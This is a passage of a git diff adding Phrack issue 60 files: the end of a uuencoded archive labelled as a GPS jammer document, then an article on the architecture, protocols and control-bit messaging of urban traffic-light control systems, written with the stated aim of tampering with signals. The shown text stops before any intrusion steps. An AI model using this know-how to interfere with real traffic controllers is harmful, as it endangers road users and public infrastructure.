+M__/N=FLL`](`8'"-T+4J7C[CA>TN;P,0*Z?3-UFQ]@T'5>)\\'0<L-AI"H&[
+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
+9N\EO9S^].W.AH.[%VY>3_PU'_`Z`=[X`````
+`
+end
+
+<--> ./gps_jammer.ps.gz.uue
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack60/14.txt b/phrack60/14.txt
new file mode 100644
index 0000000..dd942c2
--- /dev/null
+++ b/phrack60/14.txt
@@ -0,0 +1,479 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3c, Phile #0x0e of 0x10
+
+|=------------------------=[ Traffic Lights ]=---------------------------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------------=[ plunkett@hush.com ]=-------------------------=|
+
+.:Saving the planet, again:.
+
+/* 
+ * This is purely educational; 
+ * Any knowledge gained from this document is self imposed and thus
+ * the author cannot be held responsible. Any activities resulting from
+ * knowledge gained in this document is not accountable by the author.
+ * If you do not accept this, please refrain from reading further.
+ *
+ */
+#include <disclaimer.h>
+
+A more environmentally friendly way of traveling by car. As some
+of you might recall in almost all the hacking movies, books, TV shows, etc.
+there has been a case of someone fiddling with traffic lights. Well we all
+just giggled at the unrealistic aspect of it and didn't think twice. Well in
+my quest for a more appealing planet for our children I felt compelled to
+think of a way in order to reduce the amount of pollution emitted by
+vehicles of today.
+Standing at a intersection, nobody else around, you're still stuck behind the
+red light, and this invisible barrier of governmental guilt has enough power
+to let you wait there and pollute the air more and more, just for a measly
+green light. Wouldn't it be leet having a laptop in the car where you could
+just select the intersection off a list, change the timing or current stream
+running, and ride off with fewer time wasted and fewer pollutants exhausted
+and a clear conscience.
+
+Now, enough crap about the reasons, now for the technical shit.
+
+Today's traffic controlling system is a well oiled redundant network that
+utilizes the same protocols that we are all aware of. Yes it is hackable
+and it is like in the movies. :)
+here we go!
+
+a description of some of the terms used.
+
+ - controller
+        This is the technical term for a traffic light and will be
+        referred to that way.
+ - UTC
+        Urban Traffic Control, solid-state signal controllers connected
+        to central computer by means of PSTN. Provides communication
+        standard for controllers (see fig. 1)
+
+ - SCOOT
+        Split Cycle Offset Optimization Technique.
+        A standard now implemented across majority of traffic systems
+        across the world. It provides adaptive control of controllers,
+        this is done by the controlling office, it receives the traffic
+        flow data from closed loops around the intersection, which it
+        analysis and relays back current configurations in real-time
+        back to the controller.
+
+ - ITS  Intelligent Transport Systems, This is just a buzzword to describe
+        the whole system covering everything, UTC, SCOOT, CCTV(video) and
+        the whole protocol stack interlinking all of it. (see fig. 2)
+
+ - NTCIP
+        This is the protocol that is in process of becoming a standard
+        for traffic management communications. It is based on TCP/IP and
+        revolves mainly on SNMP that has specific MIB's for use in
+        controller messaging. (protocol may vary from country to country)
+        Some controllers in US are NTCIP compatible, namely Thereon and model
+        170 of NEMA controllers. CCTV, VMS, Field Processors, Ramp metering
+        are all linked via NTCIP.
+
+ - ATC
+        Area Traffic Control, This is the Central office that control
+        all the aspects of traffic control management.
+
+ - FEP
+        Front End Processor, Virtual Processing for controllers. located
+        before management computer, and connected directly to controllers
+        via instation modem rack or telemetry hardware. One FEP
+        supports up to 512 PSTN lines.
+
+ - OTU
+        In UK this is the Outstation Transmission Unit, this provides the
+        means of converting serial data coming from the central computer
+        to parallel data for use in the controller, and provides
+        interchangeability of controllers.
+        (I'm not sure if this system is a standard across the world, for
+         South Africa it is done by a CCIU Controller Communication Interface
+         Unit}
+ - CMU
+        Cabinet Monitoring Unit, This is what detects when you fiddle inside
+        the box next to the road. It reports hardware/software faults and
+        packages the data for reporting to the FEP and ATC.
+
+
+
+Figure 1.  Different link arrangements
+-------------------------------------
+
+                  ---0 junction 1
+                 /
+   0------------0----0 junction 2
+ CENTRAL  LOCAL  \ 
+ OFFICE  EXCHANGE ---0 junction 3
+
+              [UTC Radial Arrangement]
+
+
+                  ---0  junction 1
+                 /    \
+   0------------0      \
+  C.O          L.E   0-- junction 2
+                       /
+                      /
+                     0 junction 3
+
+           [UK Multi-drop UTC arrangement]
+
+
+
+Figure 2.  ITS Topologies
+-------------------------
+
+         ________     ________        ________
+        |COMPUTER|---|COMPUTER|------|COMPUTER|
+        `--------'   `--------'      `--------'
+  (coax)    |_____        |  (dialup)    |__    (radio)
+                  |       |                 |
+      __________  |   ____|_____       _____|_____
+     |CONTROLLER|-|  |  MASTER  |__   |FIELD PROC.|__
+     `----------' |  `----------'  |  `-----------'  |
+      __________  |   __________   |   ___________   |
+     | VAX/VMS  |-|  |  VAX/VMS |__|  |CCTV CAMERA|__|
+     `----------' |  `----------'  |  `-----------'  |
+      __________  |   __________   |   ___________   |
+     |COUNTSTION|-|  |CONTROLLER|__|  |CONTROLLER |__|
+     `----------'    `----------'     `-----------'  |
+                                       ___________   |
+                                      | VAX/VMS   |__|
+                                      `-----------'
+
+    (Physical links   (Physical links   (physical links
+     EIA 232)          FSK-modem)        Fiber)
+
+
+
+
+Introduction
+------------
+
+The traffic controller boxes that you see on the road have all a standard
+configuration set when commissioned, but they are all linked to a central
+office for remote configuration changes, fault reporting, resetting, etc.
+The ATC houses a FEP which connects to each controller or the local exchange.
+The FEP is the direct network connection to the controllers and queries the
+controllers per second bases and receives the responses which are transported
+to the central controlling computer [OS/2 or ALPHA VAX in S.A and UK] via
+DECnet on coaxial or other means via the LAN. The controlling computer then
+analysis the result and determines faults or other data and places it in the
+central controlling database on a VAX/VMS. The database is then prioritized
+and can be accessed via web interface on the local intranet to see fault
+reports and timing info.
+
+When a reconfiguration is issued, an operator can set all configurations
+remotely even if a total controller reset is required. This includes stream
+timings (streams are the various timing configurations), local time, light
+dimming, emergency stream (for ambulances and such), the different settings
+will be discussed later. When the operator requests a change in configuration,
+it is sent to the FEP in a large datagram which is split up and modulated
+for communication to the controller. The protocols between the OTU/CCIU and
+the FEP is usually not a standard, and propriety protocols are setup by the
+manufacturers of the units.
+                  
+a diagram of how UTC is interlinked is shown. (fig. 3)
+                           
+figure 3. Protocol and physical link diagram of UTC system
+----------------------------------------------------------
+                            ATC                  IN CONTROLLER BOX
+   ____________                           :
+  |UTC COMPUTER|           RS232 SERIAL   :
+  `------------'                          :         SERIAL
+         |                    ___ ______  :   _____   :   ________
+         | DECnet-> _______  |___|MODEM |-/--|MODEM|-----|OTU/CCIU|
+TCP/IP   |---------|  FEP  |_|___| RACK | :  `-----'     `--------'
+ETHERNET |         `-------' |___`------' :                  | RS232
+LAN   -> |                                :                  | SERIAL
+         | (NTCIP encompassed)            :               ___|______
+         |   protocols                    :              |CONTROLLER|
+         |    _______                     :              `----------'
+         |___|       |                    :
+             `-------'                    :
+             misc. devices                :
+             like VAX/VMS for             :
+             fault monitoring
+             and such.
+
+
+The communication between the controller and the ATC is done via a 
+bit stream signals where certain bits represent a preprogrammed
+function in a controller.
+A serial second-by-second bit stream is received by each controller
+continuously and is converted to parallel for use inside the controller.
+The stream consists of 16 bits, Thus 32 parallel connections can be initiated
+with the controller, and certain bit streams control certain functions and
+some have a return value for example to notify the controller which stream
+currently is running. The communication may look similar to this.
+
+1001011011011101 sent
+1000101111010101 received
+
+as said, the comms protocol is more than likely to be propriety and thus non
+standard. eg. The control bit 10 may 'mean set max green time 30s' and in
+another, 'hold vehicle stage'. but according to ATC standards globally,
+there are a couple of standards like stream control, emergency control
+and resets and more nifty features. 
+
+But this is not important because access to the controlling computer is in
+anyway necessary for control of the controller, and thus the specific
+protocol used doesn't matter.
+
+
+----------------------------------------
+communication technical details, yummy!
+----------------------------------------
+
+UTC messaging
+-------------
+
+Below is a typical description of the communication between the controller
+and ATC. UTC is the current system that is used in majority of ATC
+centers across the world. And communication is pretty much standard.
+The specific messaging data bits might be different in different
+countries since it is done proprietly by the controller and system
+manufacturers. But they tend to stick to a standard, South Africa is based
+on the UK system, And the UK system is the same as America, and so it all
+will look basically the same, except for area specific functions.
+
+UTC Control and Reply Bits  (Fn = F1,F2,F3... different stages, same for Dx) 
+---------------------------
+Control      Description                        Reply
+
+Dn (or Dx)   Demand Individual  Stage           SDn/SDx
+Fn           Force Stage
+FM           Fall Back Mode                     FC
+HI           Hurry Call Inhibit
+             Stage Confirmation, Stage n        Gn
+             Hurry Call Confirmation or Reqst   HC
+             Manual Control                     MC
+             Emergency Vehicle                  EV
+             Vehicle Red Lamp Failure 1         RF1
+             Vehicle Red Lamp Failure 2         RF2
+SFn          Switch Facility                    SCn
+SO           Solar Override
+SG           CLF Group Timer Synchronization    CG
+LO           Lamps On/Off                       LE
+LL           Local Link Inhibit
+TS           Time Switch Sync Stored Value
+TO           Take Over
+TC           Transmission Confirm
+CP           Close Car Park                     CL
+             Detector Fault Monitor             DF
+             CLF Group Timer in First Group     GR1
+             Remote Reconnect                   RR
+             Entry in Controller Fault Log      CF
+             Handset Connected                  TF
+             Lamp Fault                         LFn
+             Car Park Occup Thresh Exceeded     CA
+             Pedestrian Green Confirm           PC
+             Queue Detector Presence            VQ
+             Detector Vehicle Count             VC
+             Car Park Information               CSn
+             Queue at Car Park Entry Reservoir  CR
+             SCOOT Detector Presence            Vsn
+             Cabinet Door Open                  CO
+PV           Hold Vehicle Stage
+PX           Demand Pedestrian Stage
+             Puffin Clearance Period            PR
+             Vehicle Green Confirm              GX
+             Wait Indicator Confirm             WI
+
+A controller is typically setup to receive 16 to 32 bits of control bits
+which can be be replied to by the controller using a reply datagram.
+(note that SCOOT specific functions are done in the same way)
+
+typical Control UTC message:
+
+Bytes 1,2 Control Bytes (Address 2)
+Byte 3 (F1,F2,F3,D2,D3,DX,SO,-)    (check above table for bit descr)
+Byte 4 (-,-,-,-,-,-,-,TS)
+      
+0 0 0 0 0 0 1 0 0 1 0 1 0 0 1 0 0 0 0 0 0 0 0 0
+
+typical Reply UTC message:
+
+Bytes 1,2 Reply Bytes (Address 2)
+Byte 3 (G1,G2,G3,-,-,DF,CF,-)      (check above table for bit descr) 
+Byte 4 (-,-,-,-,-,-,-,RT)
+      
+0 0 0 0 0 0 1 0 0 1 0 1 0 0 1 0 0 0 0 0 0 0 0 0
+
+The communication is done asynchronously and in the controller represented
+as parallel, whereas in the FEP its serial. The modulation can be done
+either by FEP or instation specific controller cards.
+
+
+NTCIP Messaging (UK and some US ATC's)
+--------------------------------------
+
+I am not going to discuss the specific NTCIP messaging system because it
+is not set as a standard yet, and basically, because I haven't had the
+pleasure of playing with it. America (except NY and other big
+cities), South Africa, Namibia and I think majority of countries
